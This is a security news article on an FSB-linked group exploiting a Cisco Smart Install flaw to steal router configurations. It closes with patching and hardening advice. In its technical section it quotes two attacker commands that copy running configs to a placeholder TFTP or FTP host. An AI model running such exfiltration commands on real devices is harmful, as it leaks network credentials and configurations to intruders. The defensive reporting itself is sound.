Why Old Cisco Bugs Are Fueling New Espionage Campaigns

“Static Tundra,” tied to Russia’s FSB Center 16, is abusing a 2018 Cisco Smart Install bug to loot configs and plant router implants across critical infrastructure, Cisco Talos and the FBI warn. Patch or disable SMI now.

The FBI and Cisco Talos warned that an FSB-linked group dubbed Static Tundra is exploiting CVE-2018-0171 in Cisco IOS/IOS XE Smart Install to compromise unpatched and end-of-life devices. Targets span telecom, higher education and manufacturing, with activity focused on configuration theft, long-term persistence and reconnaissance against U.S. critical infrastructure and allied networks.

WASHINGTON — Aug. 20, 2025. The FBI is urging organizations to immediately secure unpatched Cisco networking gear after identifying a year-long cyber-espionage campaign by Static Tundra, a group linked to Russia’s FSB Center 16, that is exploiting a seven-year-old Cisco Smart Install flaw to gain and maintain access to critical networks.

What Happened

Cisco Talos says Static Tundra is compromising unpatched and often end-of-life Cisco devices by abusing CVE-2018-0171 (Smart Install) and then using SNMP and custom tooling to quietly siphon device configurations and persist for years. Victims include organizations in telecom, higher education and manufacturing across North America, Europe, Asia and Africa.

“The purpose of this campaign is to compromise and extract device configuration information en masse,” Cisco Talos wrote. Cisco Talos Blog

The FBI’s public advisory notes the actors collected configuration files for thousands of networking devices tied to U.S. critical infrastructure and, in some cases, modified configs to enable unauthorized access.

Who Is “Static Tundra”

Talos assesses Static Tundra as a sub-cluster of Energetic/Berserk Bear, historically linked to FSB Center 16. The current campaign escalated alongside Russia’s war on Ukraine, with strategic targeting of Ukraine and allied countries.

Technical Analysis: How the Intrusion Works

Initial Access

• Exploits CVE-2018-0171 in Cisco Smart Install (TCP 4786), enabling device reloads or arbitrary code execution. Patch was released in 2018 but many devices remain unpatched and some are EoL.

Execution & Lateral Operations

• Leverages SNMP (often v1/v2, weak or guessed community strings) to change running configs, create local users or enable legacy services (e.g., TELNET).
• Redirects interesting traffic via GRE tunnels and harvests NetFlow for intel value.

Persistence & Defense Evasion

• Deploys the historical SYNful Knock router implant (2015) for firmware-level persistence; access triggered by a “magic” TCP SYN packet.
• Modifies TACACS+ configuration and ACLs to impair logging and restrict access for stealth.

Data Collection & Exfiltration

• Bulk exfiltration of startup/running configs using TFTP/FTP and CISCO-CONFIG-COPY-MIB, e.g.:
  do show running-config | redirect tftp://<ip>/conf_bckp
copy running-config ftp://user:pass@<ip>/output.txt

Approximate MITRE ATT&CK Mapping (Enterprise)

• T1190 Exploit Public-Facing Application (Smart Install exposure)
• T1078 Valid Accounts (compromised/weak SNMP strings)
• T1601 Modify System Image (SYNful Knock firmware implant)
• T1048.003 Exfiltration Over Unencrypted/Non-C2 Protocol (TFTP/FTP)
• T1562 Impair Defenses (logging/TACACS+ changes)
  (Mappings inferred from Talos/FBI behaviors.)

Impact & Response

Affected Systems/Users: Unpatched or EoL Cisco IOS/IOS XE devices with Smart Install enabled—commonly older Catalyst and some Nexus models—used inside critical infrastructure, universities and manufacturers. The FBI observed thousands of U.S.-connected devices impacted.

Immediate Actions Recommended:

• Patch to a fixed IOS/IOS XE release or disable Smart Install (“no vstack”) if patching isn’t possible.
• Retire/replace EoL gear; enforce SNMPv3, rotate community strings, disable TELNET, and lock down TACACS+.
• Hunt for SYNful Knock indicators and unusual config changes; validate AAA/logging pipelines.

Potential Legal/Regulatory Fallout: Owners/operators of covered critical infrastructure may face enhanced scrutiny under sector risk-management agency guidance and incident-reporting obligations if unauthorized access or data exfiltration is confirmed. (General regulatory context; check sector-specific rules.)

The Smart Install bug (CVE-2018-0171) has been repeatedly abused since disclosure, and other states (e.g., China’s Salt Typhoon) have also targeted Cisco routers—underscoring the long tail of unpatched edge devices.

Reuters and other outlets reported the FBI/Cisco warnings highlight Center 16 activity and the strategic value of router footholds for long-term espionage.

FBI (IC3 PSA): Russian FSB actors are “exploiting … an unpatched vulnerability (CVE-2018-0171) in Cisco Smart Install” to target U.S. and global entities.

Cisco Talos: “Static Tundra is linked to the FSB’s Center 16 and targets unpatched, often end-of-life devices for long-term intelligence gathering.”

El Mostafa Ouchen, cybersecurity author and analyst: “Treat aging routers like unmonitored servers at the perimeter—if you can’t patch, decommission. Assume configs are loot and monitor for silent changes.”

What Comes Next

Expect continued scanning of exposed SMI endpoints, copy-cat operations by other states, and stepped-up pressure on operators to replace EoL gear and harden network devices with the same rigor applied to servers and endpoints.

Fast Facts (for editors)

• Threat actor/malware: Static Tundra (FSB Center 16 sub-cluster; Energetic/Berserk Bear lineage); historic SYNful Knock implant.
• CVE: CVE-2018-0171 (Cisco Smart Install).
• Sectors hit: Telecom, higher education, manufacturing; focus on U.S. critical infrastructure and allies. Cisco Talos BlogInternet Crime Complaint Center

Sources:

Cisco Talos blog on Static Tundra; FBI IC3 Public Service Announcement (Aug. 20, 2025); Cisco CVE-2018-0171 advisory/NVD; Reuters and trade press coverage. Cisco Talos BlogInternet Crime Complaint CenterNVDReutersCybersecurity Dive